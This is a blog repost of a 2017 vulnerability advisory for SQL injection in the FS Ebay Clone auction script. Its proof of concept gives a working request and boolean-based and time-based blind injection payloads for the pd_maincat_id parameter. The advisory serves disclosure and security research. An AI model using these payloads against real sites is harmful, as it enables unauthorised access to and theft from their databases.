Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863538552

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: FS Ebay Clone - SQL Injection
# Date: 2017-10-23
# Exploit Author: 8bitsec
# Vendor Homepage: https://fortunescripts.com/
# Software Link: https://fortunescripts.com/product/ebay-clone/
# Version: 23 October 17
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec

Release Date:
=============
2017-10-23

Product & Service Introduction:
===============================
This is indeed the best standard auction product pre-integrated with a robust multi-vendor interface and a powerful CMS panel. 

Technical Details & Description:
================================

SQL injection on [pd_maincat_id] parameter.

Proof of Concept (PoC):
=======================

SQLi:

https://localhost/[path]/advance-search-result.php?keywords=any&pd_maincat_id=1' AND 7301=7301 AND 'iXUk'='iXUk&submit=Search

Parameter: pd_maincat_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: keywords=any&pd_maincat_id=1' AND 7301=7301 AND 'iXUk'='iXUk&submit=Search

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: keywords=any&pd_maincat_id=1' AND SLEEP(5) AND 'aHHy'='aHHy&submit=Search

==================
8bitsec - [https://twitter.com/_8bitsec]